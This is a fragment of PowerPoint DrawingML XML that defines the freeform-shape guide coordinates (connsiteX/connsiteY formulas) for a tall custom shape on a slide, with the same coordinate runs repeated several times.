              <a:gd name="connsiteX142" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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66158 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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66158 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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49397 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 635218 h 6858000"/>
